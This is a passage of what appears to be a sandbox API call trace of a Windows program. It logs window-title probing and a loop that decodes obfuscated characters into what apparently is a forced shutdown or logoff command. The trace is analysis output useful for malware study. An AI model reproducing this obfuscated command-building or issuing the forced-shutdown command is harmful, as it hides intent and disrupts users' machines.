out: lpWideCharStr="FolderView") returned 256 [0180.844] SysStringLen (param_1="Fold") returned 0x4 [0180.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Fold", cchWideChar=5, lpMultiByteStr=0x116859c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fold", lpUsedDefaultChar=0x0) returned 5 [0180.845] SetWindowTextA (hWnd=0x103c4, lpString="Fold") returned 1 [0180.845] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0180.845] GetFocus () returned 0x0 [0180.845] lstrlenA (lpString="Fold") returned 4 [0180.845] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0180.845] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Prog") returned 4 [0180.846] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0180.846] GetFocus () returned 0x0 [0180.846] lstrcmpA (lpString1="Prog", lpString2="Fold") returned 1 [0180.846] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.846] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0180.847] IsWindow (hWnd=0x103c4) returned 1 [0180.847] IsWindow (hWnd=0x103c4) returned 1 [0180.847] IsWindow (hWnd=0x103c4) returned 1 [0180.847] IsWindow (hWnd=0x103c4) returned 1 [0180.848] GetFocus () returned 0x0 [0180.848] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0180.848] GetFocus () returned 0x0 [0180.848] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0180.848] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0180.848] GetFocus () returned 0x0 [0180.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fold", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fold", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=5 | out: lpWideCharStr="Fold") returned 5 [0180.849] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.849] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.850] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0180.851] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.900] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0180.901] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.901] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0180.901] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.902] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.903] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.903] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.903] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.904] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.904] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.905] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.905] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.906] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.906] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.907] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.907] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.907] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.908] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.908] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.908] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.909] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.909] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.910] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.910] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.911] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.911] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.912] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.912] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.913] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.913] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.914] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.915] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.915] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.915] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.916] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.916] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.917] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.917] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.918] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.918] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.919] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.919] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.920] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.920] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.920] GetForegroundWindow () returned 0x20086 [0180.920] GetLastError () returned 0x0 [0180.920] SysStringLen (param_1=" ") returned 0xff [0180.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.921] SysStringLen (param_1=" ") returned 0xff [0180.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.921] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0180.921] GetLastError () returned 0x0 [0180.921] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.921] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0180.922] SysStringLen (param_1="Pro") returned 0x3 [0180.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pro", cchWideChar=4, lpMultiByteStr=0x11684fc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pro", lpUsedDefaultChar=0x0) returned 4 [0180.922] SetWindowTextA (hWnd=0x103c4, lpString="Pro") returned 1 [0180.922] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0180.922] GetFocus () returned 0x0 [0180.922] lstrlenA (lpString="Pro") returned 3 [0180.922] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0180.923] IsWindow (hWnd=0x103c4) returned 1 [0180.923] IsWindow (hWnd=0x103c4) returned 1 [0180.923] IsWindow (hWnd=0x103c4) returned 1 [0180.923] IsWindow (hWnd=0x103c4) returned 1 [0180.924] GetFocus () returned 0x0 [0180.924] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0180.924] GetFocus () returned 0x0 [0180.924] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0180.924] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0180.924] GetFocus () returned 0x0 [0180.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0180.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=4 | out: lpWideCharStr="Pro") returned 4 [0180.925] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.925] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.926] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.926] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.927] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.927] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.928] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.928] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.929] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.929] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f126, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.930] VarSub (in: pvarLeft=0x28f1f8, pvarRight=0x28f190, pvarResult=0x28f1c0 | out: pvarResult=0x28f1c0) returned 0x0 [0180.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 